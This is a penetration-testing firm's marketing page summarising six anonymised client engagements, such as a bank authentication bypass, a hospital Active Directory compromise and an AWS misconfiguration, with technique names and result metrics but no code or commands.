Proven results

Case Studies

Anonymised engagement summaries from real client engagements. We let the findings speak for themselves.

Recent Engagements

All case studies are anonymised and published with client consent.

🏦 Financial Services Critical Findings

Core Banking Platform — Authentication Bypass & Privilege Escalation

Challenge: A Tier-1 bank needed a pre-launch security assessment of their new customer-facing banking portal before going live with 2M+ customers.

Result: Discovered a critical authentication bypass allowing account takeover via a JWT algorithm confusion attack, plus an IDOR that exposed other customers' transaction histories.

3
Critical findings
14
Total vulnerabilities
2wk
Engagement length
Web App API Auth
🏥 Healthcare HIPAA Context

Hospital Network — Active Directory Compromise in 4 Hours

Challenge: A regional hospital group with 12 sites needed to validate their internal network security posture ahead of a HIPAA audit.

Result: Achieved Domain Admin in under 4 hours via SMB relay → Kerberoasting → unconstrained delegation abuse. Patient data was accessible from 3 different attack paths.

4h
To domain admin
3
Attack paths found
3wk
Engagement length
Network Active Directory HIPAA
🛍️ E-Commerce PCI DSS

E-Commerce Platform — Payment Data Exposure via SQLi

Challenge: A fast-growing e-commerce company processing 50K+ orders/month needed a PCI DSS-aligned web application penetration test.

Result: Found a blind SQL injection in the product search API — exploitable to extract the full customer database including hashed payment card data. Remediated in 48 hours.

1
Critical SQLi found
280K
Records at risk
48h
Time to remediate
Web App PCI DSS SQLi
☁️ SaaS / Tech Cloud

B2B SaaS — AWS Misconfiguration Exposes All Customer Data

Challenge: A Series B SaaS company needed a cloud security assessment before their enterprise sales motion required ISO 27001 compliance evidence.

Result: Discovered an S3 bucket with public ACLs containing all customer data exports, plus an EC2 metadata SSRF leading to IAM credential theft and cross-account access.

2
Critical cloud findings
100%
Data exposure risk
1wk
Engagement length
AWS Cloud IAM
🏛️ Government Red Team

Government Agency — Full Red Team: Physical + Digital Breach

Challenge: A government agency requested a full-scope red team operation to test their entire security programme — including physical controls, staff awareness, and digital defences.

Result: Physical entry via tailgating, USB drop led to network foothold, spear-phishing email achieved C-suite compromise. Full kill chain in 6 days — zero detection by SOC.

6d
Full compromise
0
SOC alerts raised
4wk
Engagement length
Red Team Physical Phishing
📱 FinTech Mobile

FinTech App — Insecure Storage & Biometric Bypass

Challenge: A FinTech startup needed a mobile security assessment of their iOS and Android investment app before launch to a regulated market.

Result: Found plaintext storage of authentication tokens in SharedPreferences, a biometric authentication bypass, and an unprotected deep link allowing account balance disclosure without authentication.

2
Critical findings
9
Total vulnerabilities
10d
Engagement length
iOS Android MASVS

Your turn

Become Our Next
Success Story

Every organisation has vulnerabilities. The question is whether you find them first or an attacker does.

Start Your Engagement Explore Services